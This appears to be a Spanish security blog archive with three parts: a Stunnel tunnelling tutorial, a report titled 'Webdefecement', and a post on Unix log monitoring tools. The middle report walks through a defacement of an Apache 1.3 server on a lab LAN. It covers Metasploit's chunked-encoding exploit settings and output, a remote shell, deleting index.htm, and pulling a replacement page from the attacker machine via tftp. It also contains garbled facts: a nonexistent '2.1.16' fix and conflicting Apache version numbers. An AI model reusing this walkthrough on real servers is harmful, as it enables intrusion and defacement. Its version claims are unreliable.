Una vez que psql ha conectado con el cliente, cualquier dato será encriptado y entonces enviado al servidor Stunnel donde es desencriptado y enviado al servidor PostgreSQL. Al cliente debe serle indicado sobre qué puerto correr, además del puerto en el cual está corriendo el proceso servidor.

El uso más común de Stunnel es para enviar datos desde un cliente local a un servidor remoto. La forma de hacer esto es iniciar el proceso cliente Stunnel localmente, bien llamándolo con un script de arranque (tal como /etc/rc.d/rc.local) o bien llamándolo directamente desde el directorio de instalación. Luego debe iniciar el proceso Stunnel remotamente en la máquina donde PostgreSQL está corriendo. Como con el cliente, usted puede querer iniciar el servidor automáticamente durante el arranque del sistema.

Tanto las ejecuciones del cliente como del servidor STunnel en un escenario de ejemplo se demuestran en los ejemplos siguientes.

EJEMPLOS

Ejemplo 1
Veamos un ejemplo completo de cómo conseguir una comunicación segura con control de acceso al puerto 25 (SMTP) de un servidor desde un PC, suponiendo que en ninguna de las máquinas tenemos software SSL, y que hemos seguido el procedimiento de la página antes mencionada para crear los certificados de servidor y de clientes:
Llevarse el fichero client.pem al PC, al directorio donde tengamos el stunnel.exe.
Ejecutar en el servidor:
stunnel -d 1999 -r 25 -p $CADIR/certs/server.pem \
-v 3 -A $CADIR/cacert.pem -a $CADIR/certs
Ejecutar en el cliente:
stunnel -c -d 25 -r servidor:1999 -p client.pem
Configurar el cliente de correo de forma que el servidor SMTP es el propio PC.

Si en el servidor queremos aceptar cualquier cliente cuyo certificado haya sido firmado por nuestra CA, la orden a ejecutar en el servidor sería:

stunnel -d 1999 -r 25 -p $CADIR/certs/server.pem \
-v 2 -A $CADIR/cacert.pem

Ejemplo 2
Ejecutar en el servidor:
[user@remote ~]$ # Este comando innicia el servidor en la máquina remota.
[user@remote ~]$ stunnel -P/tmp/ -p ~/stunnel.pem -d 9000 -r localhost:5432
Ejecutar en el cliente:
[user@local ~]$ # Este comando inicia el cliente en la máquina local.
[user@local ~]$ stunnel -P/tmp/ -c -d 5432 -r 192.168.1.2:9000

El comando de máquina remota (el primero) le dice al servidor que use /stunnel.pem como certificado para la encriptación, y que abra un proceso Stunnel como demonio. El parámetro -d 9000 provoca que el demonio escuche datos encriptados en el puerto 9000. El parámetro -r localhost:5432 le dice al proceso demonio que cuando reciba datos encriptados en su puerto de escucha (9000, en este caso), debería desencriptarlos y enviarlos a localhost en el puerto 5432 (el cual es el puerto de PostgreSQL, significando que los datos desencriptados serán enviados al servidor de bases de datos en la máquina local).

El segundo comando abre una instancia de Stunnel en la máquina cliente, en modo cliente (como dicta el flag -c), que escucha por el puerto 5432. El parámetro -r 192.168.1.2:9000 le indica al proceso que la computadora servidora está localizada en 192.168.1.2, y que está a la escucha por el puerto 9000 para paquetes encriptados.

Ambos modos requieren el flag -P /tmp/ para proporcionar una ruta temporal para el archivo PID, el cual es el archivo que almacena el ID de sistema del proceso Stunnel. No necesita especificar el nombre del archivo PID, sólo con la ruta ya es suficiente (el nombre de archivo será por defecto algo parecido a stunnel.localhost.9000.pid), aunque podría especificarlo si lo desea.

Una vez que cada uno de estos procesos Stunnel están corriendo en sus respectivas máquinas, el cliente psql puede ser apuntado al puerto 5432 en la máquina cliente. Los paquetes enviados a este puerto serán encriptados de forma transparente, enviados al puerto 9000 en la máquina servidora, desencriptados y enviados a PostgreSQL en el puerto 5432. Esto es similar al túnel SSH discutido en la sección denominada ``SSH/OpenSSH'', pero con una notable distinción: el proceso cliente Stunnel puede ser creado sin ningún tipo de autenticación en el servidor remoto.

Esta encriptación ocurre de forma completamente separada de los procedimientos normales de autentificación de PostgreSQL; en cuanto le concierne al proceso en segundo plano postmaster, los datos son enviados a través de él en texto plano, porque estos son desencriptados antes de ser reenviados al postmaster. El uso de Stunnel en conjunción con la autenticación mediante contraseña puede ser el ideal, ya que éste usa una política de restricción basada en contraseñas, y también encripta dichas contraseñas sobre la conexión de red.

Adicionalmente, como ya mencionamos, usted tiene la opción de ejecutar los dos procesos Stunnel localmente para encriptar paquetes entre dos puertos TCP/IP locales. La iniciación de ambos procesos cliente y servidor sobre la misma máquina se demuestra en el siguiente ejemplo. Usando Stunnel localmente.

[user@local ~]$ stunnel -P/tmp/ -p ~/stunnel-3.15/stunnel.pem -d 9000 -r 5432
[user@local ~]$ stunnel -P/tmp/ -c -d 5433 -r localhost:9000

El primer uso de stunnel abre el proceso servidor, y le dice al mismo que use /stunnel-3.15/stunnel.pem como archivo de certificado. También instruye al demonio para que escuche conexiones por el puerto 9000, y que envíe los datos desencriptados desde ese puerto al puerto 5432. El ejemplo usa el puerto 5432 porque el servidor PostgreSQL está corriendo con ese puerto.

El segundo uso de stunnel abre el proceso cliente Stunnel en el puerto 5433 (escogido arbitrariamente para enlazar al puerto PostgreSQL, en éste caso). Ese demonio es instruído para encriptar los datos entrantes, y para reenviarlos al proceso servidor a la escucha en la máquina localhost por el puerto 9000.

LIMITACIONES
Stunnel tiene dos opciones a la hora de decidir cómo correr en su sistema: usando inetd, o ejecutando el binario Stunnel como demonio. Esta última es la forma preferida, ya que usar inetd puede crear limitaciones en el software debido a varias cuestiones relacionadas con SSL. Estas limitaciones incluyen:
Stunnel debe ser inicializado para cada conexión por inetd
No es posible ninguna caché de sesión
inetd requiere forking (lo cual causa sobrecarga en el procesador)

VULNERABILIDADES
Las versiones previas a la 3.11 de Stunnel contienen diversas vulnerabilidades que hacen que su uso resulte inseguro. Stunnel es una herramienta que permite hacer un "forwarding" de puertos TCP/IP entre dos máquinas que lo estén ejecutando, utilizando tecnología SSL para asegurar la autenticidad, la integridad y la confidencialidad de las transmisiones. Las versiones previas a la 3.11 contienen tres vulnerabilidades:
El generador de números pseudoaleatorios contiene errores que hacen que sus valores sean predecibles, comprometiendo la calidad criptográfica de la sesión y de las claves generadas con esta herramienta.
El programa genera un fichero "pid" (donde se almacena el PID del proceso) de forma insegura, siendo vulnerable a ataques a través de enlaces simbólicos.
El uso de la función "syslog()" es incorrecto, siendo vulnerable a ataques de formato.
Se recomienda a todos los usuarios de Stunnel que actualicen a la versión 3.11 o superior cuanto antes.

CONCLUSIONES.

Con stunnel se pueden entubar (por decirlo de alguna forma) conexiones TCP de y hacia puertos arbitrarios entre un servidor y un cliente. Se puede redirigir un puerto local a uno remoto en donde está corriendo el demonio stunnel el cual a su vez redirige ese puerto a uno estándar donde está escuchando algún servicio. Me explico: Quería que las conexiones POP3 viajasen de forma segura entre el cliente y el servidor.

Diseñado para ofrecer la seguridad SSL a servidores (demonios) o clientes que no han sido programados con soporte SSL.
Se puede utilizar desde inetd o xinetd.
El uso más frecuente es para cifrar servicios como POP, IMAP, SMTP, LDAP, etc.
Junto con PPP se puede crear fácilmente una Red Privada Virtual RPV (VPN).
Se puede configurar para validar a los clientes mediante certificados.

REFERENCIAS.

http://www.sobl.org/traducciones/practical-postgres
Aplicación en bases de datos
http://www.stunnel.org/faq/
Pagina principal de Stunnel
http://www.uni-freiburg.de/rz/pc/software/stunnel/
Stunnel 3.4a packaged in a Windows Install Wizard

http://www.exim.org/pipermail/exim-users/Week-of-Mon-19991011/014751.html
Using Stunnel with Exim

http://www.onsight.com/faq/stunnel/
The original Stunnel Web FAQ (retired)

http://stunnel.mirt.net/
The official stunnel home page

http://www.rickk.com/sslwrap/
programa semejante a stunnel
http://www.ssh.com
Conectividad SSH
http://www.openssh.com
Conectividad SSH Libre
http://www.openssl.org
Conectividad SSH Libre

WEBDEFECEMENT

2008-02-06T05:59:00.000-08:00

Introducción

Apache es el servidor web más popular del mundo, con más del 68% de cuota de mercado. Se trata de un proyecto de Código Abierto, con versiones disponibles para casi cualquier sistema operativo imaginable.

Apache es un servidor HTTP de código abierto, seguro, eficiente y extensible, para sistemas operativos UNIX y derivados, así como plataformas Microsoft Windows, que goza de gran popularidad, siendo la solución más empleada para servir HTTP a nivel mundial.

Descripción de la vulnerabilidad.

Las versiones de Apache previas a la 1.3.26 y 2.0.39 son susceptibles a un ataque realizado a través de cabeceras incorrectas en los "chunked data". Los "chunked data" (datos troceados) permiten enviar segmentos de datos de forma paulatina, por ejemplo, si no conocemos el tamaño final de los datos pero queremos realizar la transmisión a medida que los vamos obteniendo, en vez de esperar a tenerlos todos. Se trata de una modalidad del protocolo HTTP poco utilizada.

En este caso, la petición preparada con una cabecera 'Transfer-Encoding: chunked' y un 'Content-Length' pueden provocar que Apache remita una petición modificada con la cabecera 'Content-Length' original. En éstas condiciones, la petición maliciosa podría ir de polizón junto a la válida, siendo los posibles resultados tan peligrosos y variopintos como envenenamiento de caché, Cross Site Scripting, secuestro de sesiones y otras tipologías de ataque similares.

Las versiones de Apache previas a la 1.3.26 y 2.0.39 no gestionan adecuadamente la presencia de valores ilegales en las cabeceras "chunked data". Los efectos que esto provoca son:

a) Si el servidor es 1.3.* y está ejecutándose bajo plataformas Unix y CPU 32 bits, el ataque sólo consigue matar un proceso Apache hijo. Dado que Apache 1.3.* está diseñado para utilizar un proceso padre como monitor, y varios procesos hijos para atender las peticiones en sí, con cada proceso atendiendo una petición concreta en cada momento, este ataque simplemente obliga al proceso padre monitor a lanzar un nuevo proceso hijo. Ello supone un pequeño incremento del consumo de CPU. Se trataría, por tanto, de un ataque DoS (Denegación de Servicio), pero de baja incidencia y efectividad, dependiendo del sistema operativo.
b) Si el servidor es 1.3.*, está ejecutándose bajo plataforma UNIX y la CPU es de 64 bits, el atacante puede lograr, bajo ciertas condiciones y sistemas operativos, ejecutar código arbitrario en el sistema, con los privilegios del proceso Apache.
c) Si el servidor es 1.3.* y está ejecutándose bajo MS Windows, el atacante puede ejecutar código arbitrario en el servidor, con los privilegios del proceso Apache.
d) Si el servidor es 2.0.*, el atacante puede desencadenar un ataque DoS (Denegación de Servicio), cuya efectividad depende de la plataforma y de los detalles de configuración del servidor Apache.

La solución de esta vulnerabilidad problema pasa por la actualización de todos los demonios Apache pertenecientes a la rama 2.0.x a la versión 2.1.16, que corrige el problema. Nótese que la rama 2.1.x está en experimentación, con lo que instamos a los administradores de Apache a que repasen concienzudamente los contenidos que el proveedor ofrece en el sitio web oficial y las posibles repercusiones en cuanto a estabilidad que origine la actualización.

Exploit

La técnica fue originalmente descubierta y documentada por los analistas de Watchfire, y consiste básicamente en lanzar varias peticiones especialmente preparadas, de modo que dos dispositivos HTTP (clientes, servidores, cachés, etc.) podrían visualizar distintos tipos de peticiones. Esto permitiría que usuarios maliciosos introdujeran peticiones camufladas en un dispositivo, sin que el otro se percatara.

Tipos de exploits. Los exploits se pueden clasificar según las categorías de vulnerabilidades utilizadas:
De desbordamiento de buffer.
De condición de carrera (race condition).
De error de formato de cadena (format string bugs).
De Cross Site Scripting (XSS).
De Inyección SQL.
De Inyección de Caracteres (CRLF).
De denegación del servicio
De Inyección múltiple HTML (Múltiple HTML Injection).
De ventanas engañosas o mixtificación de ventanas (Window Spoofing).

Existen ya "exploits" que aprovechan la vulnerabilidad Chunked Encoding en los servidores Apache.

Chunked transfer-coding

HTTP/1.1 resolvio el problema de delimitacion del tamaño de mensajes mediante el Chunked transfer-coding. En esta caso el emisor rompe el mensaje en varios pedazos (chunks) de tamaño arbitrario. Si el servidor utiliza codificación Chunked, debe de colocar un encabezado de codificación de transferencia como "chunked".

Su contenido puede realizar el rompimiento del paquete principales en varios de tamaño determinado y menor al principal, los cuales llama paquetes Chunk, cada uno de los cuales tiene prearreglado su tamaño en bytes. Por ejemplo un tamaño de 0 bytes corresponde el fin de una respuesta de mensaje.

Chunked encoding es util cuando una gran cantidad de datos son enviadas al cliente, por lo que si se envía en un solo paquete, la respuesta del cliente no sera conocida por el serivdor hasta sea completamente procesado el paquete. Por ejemplo el envio de de resultados de un Query de una base de datos a una tabla.
Si se realiza de esta forma el encabezado Content-Length debe ser programado para que envie el resultado antes de calcular el contenido o tamaño del paquete enviado.

Sin embargo con Chunked encoding esto se realiza de una forma mas sencilla, ya que una vez que se ha terminado de enviar la query se envia un paquete chunk con tamaño cero, para identificar el fin del query.

Este mecanismo permite no saturar el buffer, por lo mejoran el desempeño del servidor y aumentan su velocidad de transmisión.

¿En qué consiste la vulnerabilidad?
El Chunked Encoding es diseñado para facilitar la fragmentación de peticiones del protocolo HTTP. El Apache no puede calcular correctamente el tamaño del buffer requerido.

Reporte de Hackeo a un Servidor Web

A continuación se reporta el desarrollo de los pasos del hackeo.

Se utilizaron las siguientes herramientas de software para lograr nuestro objetivo:

Nmap. Para el escaneo de puertos y el de vulnerabilidades del servidor.
Nessus Para el escaneo de vulnerabilidades del servidor
Metasploit Framework 2.6. Como herramienta de hackeo.
Servidor TFTP ServerPro 2000.
Apache 1.3.17. Como servidor.
Windows XP (con service pack2). En el Sistema operativo de ambas máquinas.

Metodologia de Webdefecement utilizada

Paso # 1
Instalar el servidor Apache 1.2.17, desarrollar y montar el sitio web. Se selecciona esta versión por tener conocimiento de sus vulnerabilidades que son parte esencial para poder tener éxito en el ataque. El servidor tiene la direccion IP 192.168.1.18.

Paso # 2
Una vez que corre el servidor víctima la página principal la podemos observar desde nuestro equipo, conectandonos al servidor desde Internet Explorer.

Paso # 3
Ejecutamos el programa NMAP, con la finalidad de conocer cuál es el puerto activo para atacar, el cual por defecto en el Apache es el 80.

Paso # 4
Se ejecuta el Nessus a fin de conocer y verificar la vulnerabilidad. Al termino presenta un informe de vulnerabilidades de el servidor.

Ya que obtenemos el puerto que servirá de víctima, realizamos el escaneo de vulnerabilidades desde el host que realizara el ataque. Identificamos el tipo de servidor que se encuentra corriendo y la versión. Identificando la vulnerabilidad y el puerto abierto.

Paso # 5
Una vez detectada la vulnerabilidad: Apache Chunked-Encoding Memory Corruption Vulnerability, utilizamos el Metasploit el cual cumple con las características para atacar esa vulnerabilidad.

Ingresamos los parámetros necesarios para realizar el ataque en al herramienta de Metasploit, como el puerto y la IP, son obtenidos del escaneador de puertos.

Los parámetros que debemos teclear en el Metasploit son:
LHOST xxx.xxx.xxx.xxx
RHOST xxx.xxx.xxx.xxx
LPORT xxxx
RPORT xx
PAYLOAD win32_bind
TARGET apache_chunked_win32(win32_bind)

Una vez ingresados los parametros, iniciamos el exploit.

[*] Starting Bind Handler.
[*] Trying Apache.org Build 1.3.9->1.3.19 [ 0x00401151/6 ]
[*] Trying Apache.org Build 1.3.9->1.3.19 [ 0x00401151/2 ]
[*] Trying Apache.org Build 1.3.9->1.3.19 [ 0x00401151/0 ]
[*] Got connection from 192.168.1.65 <-> 192.168.1.18

Damos un clic en session 1, y nos abre otra ventana con la consola.

Paso # 6
El Metasploit se conecta a la consola del servidor y nos permite hacer el hackeo. Para lo cual se eliminó el sito web del servidor para ocasionar que a los clientes les marque un error al abrir la página o al actualizarla.

En la consola de MS-DOS del servidor remoto, inicia en la ruta donde se encuentra el servidor Aapache, debido a que este servicio provoco la falla.

C:\Archivos de programa\Apache Group\Apache>

Una vez en la consola nos dirijimos al directorio htdocs, donde se encuentran las paginas que aloja el servidor Apache, y verificamos con una instruccin dir su contenido y verificar cual es la pagina principal del servidor.

C:\Archivos de programa\Apache Group\Apache

>>>cd htdocs

C:\Archivos de programa\Apache Group\Apache\htdocs

>>> dir

El numero de serie del volumen es: 24D1-44C2

Directorio de C:\Archivos de programa\ApacheGroup\Apache\htdocs

21/09/2007 08:15 a.m. .

21/09/2007 08:15 a.m. ..

23/08/2004 03:14 p.m. 5,663 ! Read Me !.txt0

7/09/2007 11:57 a.m. animaciones

07/09/2007 11:57 a.m. CIENCIA

07/09/2007 11:56 a.m. cultura

07/09/2007 11:56 a.m. deportes

07/09/2007 11:55 a.m. efemerides

07/09/2007 11:54 a.m. EJEMEX

07/09/2007 11:53 a.m. Fonts

07/09/2007 11:53 a.m. HUMOR

12/09/2007 02:49 p.m. IMAGENES

07/09/2007 11:52 a.m. Images

10/09/2007 01:40 p.m. 17,526 index.htm

04/09/2007 01:14 a.m. manual

07/09/2007 12:02 p.m. MURAL

07/09/2007 11:52 a.m. Photoshop PSD Files

07/09/2007 12:02 p.m. respaldos

07/09/2007 11:52 a.m. tips

07/09/2007 11:52 a.m. _notes

2 archivos 23,189 bytes

18 dirs 3,924,934,656 bytes libres

En este caso se distingue por su tamaño que la página principal es: index.htm.
Para primeramente negar este servicio, borramos la pagina principal (index.htm), inclusive se pueden borrar el resto de carpetas, verificando se haya borrado.

C:\Archivos de programa\Apache Group\Apache\htdocs

>>> del index.htm

del index.htm

C:\Archivos de programa\Apache Group\Apache\htdocs

>>> del index.htm

del index.htm

No se encuentra

C:\Archivos de programa\Apache Group\Apache\htdocs\index.htm

Para poder confirmar que la página ha sido hackeada, se debe recargar la página para que nos muestre el mensaje de que "no puede encontrar la pagina solicitada".

Paso # 7
El siguiente paso es poner otra pagina, sustituir por una pagina que puede realizar las acciones o procesos que nosotros hayamos programado en la pagina.

Para lo cual necesitamos instalar e iniciar un servidor de TFTP y conectarnos a nuestro equipo enviando al equipo hacheado los archivos que sean necesarios para realizar el ataque.

La conexión se realiza mediante las instrucciones siguientes:

C:\Archivos de programa\Apache Group\Apache\htdocs

>>> tftp 192.168.1.65 get index.htm tftp 192.168.1.65 get index.htm

Transferencia terminada: 648 bytes en 1 segundo, 648 bytes/s

Se debe tener en consideración que es recomendable poner la otra pagina con el mismo nombre que tenia la original de lo contrario modificar el archivo de configuración del servidor Apache y cambiar el nombre de la pagina de inicio.

En la pantalla del servidor TFTP se puede verificar los archivos que se enviaron al equipo atacado.

Paso # 8

Ya copiada nuestra pagina en el servidor Apache solo resta realizar la prueba de conexión al servidor y verificar que pagina abre.

Conclusiones

Como pudimos ver la seguridad de un servidor es vulnerable si no se realizan las actualizaciones pertinentes por parte del soporte técnico de los proveedores del softwares y utilizar cualquier herramienta que haga más segura la publicación en Web como detectores de Intrusos y Firewalls.

Bibliografía

http://www.apsis.ch/pound/pound_list/archive/2005/2005-09/1127207369000

http://httpd.apache.org/info/security_bulletin_20020617.txt

MEJORES PRACTICAS Y HERRAMIENTAS PARA EL MONITOREO DE BITACORAS EN UNIX

2008-01-31T07:14:00.000-08:00

INTRODUCCION

Que es un log?
Registro oficial de eventos durante un periodo de tiempo en particular. Para los profesionales en seguridad informática un log es usado para registrar datos o información sobre quien, que, cuando, donde y por que de un evento que ocurre para un dispositivo en particular o aplicación.

La mayoría de los logs son almacenados o desplegados en el formato estándar ASCII. De esta forma logs generados por un dispositivo en particular puede ser leído y desplegado en otro diferente.

Propósito de los LOGS
Todos los sistemas pueden verse comprometidos por un intruso, de manera local o remota.

La seguridad no sólo radica en la prevención, sino también en la identificación. Entre menos tiempo haya pasado desde la identificación de intrusión, el daño será menor; para lograr esto es importante hacer un constante monitoreo del sistema.

De cualquier forma que se realice una proteccion de Unix debe incluir el monitoreo y revision de LOGS de una forma comprensiva, precisa y cuidadosa.

Los logs tienen numerosos propósitos:
Ayudar a resolver problemas de todo tipo
Proveer de avisos tempranos de abusos del sistema.
Después de una caida del sistema, proporcionan datos de forensia.
Como evidencia legal

SINTESIS.

Auditoría del Sistema
Una parte integral de cualquier sistema UNIX son sus facilidades de manejo de bitácoras. La mayoría del manejo de bitácoras esta provisto por dos programas principales: sysklogd y klogd. El primero provee de un sistema de bitácoras para los programas y las aplicaciones, mientras que el segundo provee del manejo de bitácoras para el kernel.

Klogd actualmente envía la mayoría de los mensajes al syslogd, pero en ocasiones enviará mensajes a la consola.
Sysklogd actualmente maneja las tareas de procesar la mayoría de los mensajes y enviarlos al archivo o dispositivo apropiado; esto se configura dentro del archivo /etc/syslog.conf.

Por defecto la mayoría de los archivos de bitácora están situados en /var/log, y generalmente los programas con su sistemas de bitácora internos (los servidores httpd en su mayoría) guardan sus archivos de bitácora en /var/log/nombre-de-programa, lo que permite centralizar los archivos de bitácora y hace fácil ponerlos en una partición separada.

Adicionalmente existen programas que manejas su propio intervalo de registro de bitácoras, uno de los más interesantes es el shell bash. Por defecto el bash guarda un archivo histórico de los comandos ejecutados en ~usuario/.bash_history, este archivo pude ser extremadamente interesante de leer, porque en muchas ocasiones muchos administradores escriben accidentalmente sus contraseñas en la línea de comandos.

Un mundo aparte a la hora de generar (y analizar) informes acerca de las actividades realizadas sobre una máquina Unix son los sistemas con el modelo de auditoría C2; mientras que con el modelo clásico se genera un registro tras la ejecución de cada proceso, en Unix C2 se proporciona una pista de auditoría donde se registran los accesos y los intentos de acceso de una entidad a un objeto, así como cada cambio en el estado del objeto, la entidad o el sistema global. Esto se consigue asignando un identificador denominado Audit ID a cada grupo de procesos ejecutados.

Unix system log files:
utmp. Informacion acerca de los usuarios actuales.
wtmp. Se encuentran los logins and logouts (time stamps, shutdowns y reboots).
lastlog. Los ultimos logins se registran en este archivo.

Estrategias para la administración de logs.
Una estación como servidor de logs.
Estaciones de una red configuradas para enviar sus log a un servidor especifico.
Rotación de los archivos de log.
Comprobación de integridad sobre los archivos renombrados (Archivos rotados).

Escenarios
Se pueden presentar dos escenarios principales:
Un único servidor central para la administración de Logs.
Al tener un único y común servidor de logs se establece también un único punto de falla o ataque. El sistema por completo dependería de la disponibilidad de este punto e igualmente un atacante al obtener acceso a este servidor pondría en duda la validez de los logs y la utilización de estos como evidencia en una investigación formal

Diferentes servidores que almacenan los logs de acuerdo a una clasificación de los mismos.
Tener un servidor para grupos de fuentes de logs, si el servidor de logs de los servidores con sistema operativo Windows NT falla, seguirá estando disponible el servidor de los de las maquinas Unix y desde luego los servidores de los demás dispositivos. Una forma de aumentar la disponibilidad es tener una replica de los logs en otros servidores de logs, alta redundancia.

Rotación de logs.
Los archivos de log pueden rápidamente consumir gran cantidad de almacenamiento en un servidor centralizado de logs. La técnica de rotación de logs permite limitar el volumen de datos que se tienen disponibles para examinar fácilmente, en este caso en el servidor de logs, y además controlar el número de archivos de logs que estarán expuestos a un posible daño por parte de un intruso.

Ya que la rotación depende del tiempo, es muy importante que tanto los servidores, como los dispositivos que producen los logs posean una alta exactitud en el tiempo. Para esto se puede utilizar el servicio Network Time protocol NTP.

Protección de logs.
Para lograr que los Logs sean confiables y válidos en determinadas situaciones como evidencia, se debe tomar medidas que protejan la exactitud, autenticidad y accesibilidad de los archivos

Exactitud.
Registrar todo en los archivos Logs: Configurar los logs de los sistemas para registrar la mayoría de la información que se pueda.
Manteniendo el tiempo real: Sincronizando las maquinas con un fuente de tiempo externa, como servidores NTP.
Usar múltiples sensores: Combinando logs de varios dispositivos, se aumenta el valor dado a cada uno.

Autenticidad. Se puede decir que un archivo de log es autentico si se puede probar que ellos no han sido modificados desde que ellos fueron originalmente registrados
Movimiento de Logs: se debe cambiar la localización de los archivos en si, se debe considerar trasladar los logs a una máquina diferente a la cual los produce.
Firmas, Encripción y Checksums: La única forma de estar absolutamente seguro que un archivo no ha sido modificado es firmar y encriptar el archivo de log usando PGP o algún otro esquema de llave-publica de encripción.
Trabajar con copias: Cuando se realiza cualquier tipo de análisis sobre los archivos de logs, nunca se debe realizar sobre el archivo original.
Asegurar la integridad del sistema: Se debe auditar permanentemente todos los cambios que se produzcan en el sistema.
Documentación de procesos: Establecer un proceso significa crear un documento que liste y detalle cada paso tomado, ya sea de forma manual o automático a la hora de recolectar la evidencia. Además, cualquier scripts que se utilice en el procesamiento y recolección de archivos de logs, deberá también contener comentarios explicando lo que exactamente se esta realizando.

Accesibilidad o Control de Acceso: Una vez el archive de log es creado debe ser auditado y protegido para prevenir accesos no autorizados.
Restringir el acceso a archivos: Un archivo de logs necesita ciertos permisos para que la aplicación o sistema que o produce pueda registrar eventos en él. Pero luego que esto se produce el archivo se debe cerrar y nadie debe tener acceso a modificar el contenido del mismo.
Cadena de custodia Al mover los archivos desde un servidor a un dispositivo offline, o cualquier otro manejo que se ha planeado realizar, es muy importante registrar los cambios de ubicación que los archivos han tenido

Almacenaje de logs.
Entre las formas comunes de almacenaje se encuentran aquellos dispositivos, medios y procedimientos estándares que utilizan las compañías para la realización de Backups de datos. Entre estos podemos encontrar el almacenaje en Cintas, CD-R, CD-RW, o Zip/Jazz drives.

El siguiente paso es lograr que estos datos permanezcan incorruptibles a lo largo del tiempo, esto se puede lograr con estado de solo lectura. Una forma de almacenar los logs con un estado de solo lectura es utilizando medios que físicamente están protegidos contra escritura.

Otros aspectos que hay que considerar es limite de vida de cada dispositivo y que la encripción de datos es recomendada en aquellos archivos de logs que posean datos críticos

Monitoreo en bitácoras
Generalmente no deseamos permitir a los usuarios ver los archivos de bitácoras de un servidor, y especialmente no queremos que sean capaces de modificarlos o borrarlos. Normalmente la mayoría de los archivos de bitácoras serán poseídos por el usuario y grupo root, y no tendrán permisos asignados para otros, así que en la mayoría de los casos el único usuario capaz de modificar los archivos de bitácoras será el usuario root.

Debido a la cantidad de información que se genera en la bitácoras, siempre es bueno adoptar algún sistema automático de monitoreo, que levante las alarmas necesarias para cuando algún evento extraño suceda.
El sistema operativo Debian utiliza LogCheck para realizar el análisis y monitoreo de bitácoras, RedHat emplea LogWatch, etc.

Ejemplos:

CDM
Software que permite la monitorización de UNIX, actualmente soportan varias versiones de UNIX y Linux, incluyendo Solaris, AIX, HP-UX, Irix, Linux, Sinix y Tru64 UNIX. Está compuesta por 3 módulos que se pueden usar individualmente o en conjunto para obtener la máxima visibilidad del rendimiento del sistema UNIX:
CPU, Disco y Memoria
Monitor de Procesos
Monitor de archivos Log

El Monitor de Archivos Log vigila los archivos log basados en formato ASCII y extrae información predefinida, eliminando la necesidad de intervención manual. Las utilidades de búsqueda del monitor permiten una definición sofisticada de ficheros log complejos y variables. Se pueden vigilar varios archivos log a la vez, y definir cualquier cantidad de perfiles de búsqueda para cada archivo.

Características:
Monitor de archivos log ASCII
Soporte de múltiples formatos de archivos
Un mensaje por linea
Archivos complejos con mensajes multilínea
Archivos con formato sin estructura
Definición fácil de perfiles usando
Expresiones Regulares :
Patrones
Posición absoluta en columnas
Posición relativa en caracteres
Monitorización de múltiples archivos simultáneamente
Múltiples perfiles de búsqueda para cada archivo
Consumo mínimo
Se puede buscar en el archivo completo o solo en las lineas nuevas

TANGO04

Esta herramienta nos permite alcanzar un mainframe con diferentes niveles de servicio, monitorear servidores, integrar diferentes arquitecturas, ademas:
Uso del CPU
Uso del File System
Abuso en el uso de procesos por el CPU
Promedio de carga de trabajo
Informacion general sobre procesos.
Procesos por usuario
Memoria Virtual (swap)

AIDE (Advanced Intrusion Detection Environment)

AIDE como su nombre lo dice es un detector de intrusos, tal como Tripwire. Tal como tripwire crea una base de datos basada en las reglas establecidas, la cual es usada para verificar la ointegridad de un archivo. Ademas AIDE permite checar inconsistencias en los atributos de archivos

Osiris

Osiris mantiene un detalle de los cambios de los logs en el flie system, se puede configurar para que envie un mail al adminstrador con estos logs, los hosts son escaneados periodicamente, mantiene al adminstrador constantemente prevenido contra ataques de trojanos. El proposito principal es aislar los cambios que indicen una amenaza o compromentan el sistema.

Samhain

Software multipalataforma, open source para verificación centralizada del los archivos de sistema (file system), basado en sistemas POSIX, capza de monitorear diferentes sistemas operativos desde un servidor central. Entre sus características principales se encuentran:
Consola basada en Web.
Monitoreo de log multiplataforma.
Tamper resistance[6]

Centrify DirectAudit

Permite cumplir reglas estricats en el File System, inspeccionar los problemas que se presenten a profundidad y proteger contra amenazas en UNIX. DirectAudit detalla los logs, determinando su importancia, enviando reportes, accesso de usuarios a sistema, que codigos ejecutaron, que cambios hicieron, etc.

Herramientas para la administración de logs.

Tripwire
Es una herramienta diseñada especialmente para Sistemas Operacionales UNIX. Dicha herramienta por medio de funciones se encarga de generar un Hash único por cada archivo que se le desee proteger su integridad. De esta forma cuando se presente un cambio en un log por parte del atacante, este cambio será notificado al administrador (enviándose un mail automático), ya que no reflejará el hash original. Para realizar dichas detecciones Tripwire también se basa en: CRC-32, MD5, SHA y HAVAL (firma digital de 128 bits).
logrotate
Esta herramienta alterna, comprime y envía logs de sistema. Está diseñada para facilitar la administración de los sistemas que generan un gran número de archivos de logs. Permite la rotación automática, comprensión, extracción y envió de los archivos de logs. Puede manipularse cada archivo log diaria, semanal o mensualmente, o cuando se haga demasiado grande.

SYSLOG
Es la principal herramienta de UNIX para llevar la bitácora de eventos. Con este sistema, se puede configurar el manejo de bitácoras a un nivel extremadamente alto de detalle y cada flujo de registros puede ir a un archivo diferente. Una habilidad muy buscada y muy potente del syslog es su capacidad de enviar registros de bitácoras a computadoras remotas. Esto permite centralizar las bitácoras en un solo servidor y fácilmente verificar los archivos de bitácora por razones de violaciones de seguridad y otras cosas extrañas en toda la red.

La mayoría del manejo de bitácoras esta provisto por dos programas principales: sysklogd y klogd. El primero provee de un sistema de bitácoras para los programas y las aplicaciones, mientras que el segundo provee del manejo de bitácoras para el kernel.
Klogd actualmente envía la mayoría de los mensajes al syslogd, pero en ocasiones enviará mensajes a la consola.
Sysklogd actualmente maneja las tareas de procesar la mayoría de los mensajes y enviarlos al archivo o dispositivo apropiado; esto se configura dentro del archivo /etc/syslog.conf.
Sin embargo existen varios problemas con el syslogd y el klogd, la principal es que si un atacante logra acceso de root, podrá modificar los archivos de bitácoras y nadie lo notará.
Cada mensaje enviado al sistema de bitácoras tiene dos clasificadores: el servicio y el nivel. El servicio indica el tipo de programa que envió el mensaje y el nivel es el orden de importancia. Sysklogd y klogd no son los únicos sistemas para el seguimiento de bitácoras, existen otros, entre los cuales podemos nombrar:
modular syslog. Firma digitalmente los registros de bitácora para que cualquier alteración en ellos sea inmediatamente detectable.
next generation syslog. Permite el firmado digital y además puede clasificar los registros de otras maneras (como patrones en los registros) además del tipo de servicio y el nivel.
Nsyslogd. Añade soporte para SSL (Secure Socket Layer) en la transmisión de bitácoras a una computadora remota.

Configuración del syslog
La lista de servicios disponibles en el syslogd es:
AUTH. Para mensajes de seguridad/autorización (obsoleto, ahora se utiliza AUTHPRIV)
AUTHPRIV . Mensaje de seguridad/autorización
CRON. Para los servicios de tareas programadas (cron y at)
DAEMON. Servicios del sistema sin un servicio especificado
FTP. Servicio de ftp
KERN. Mensajes del kernel
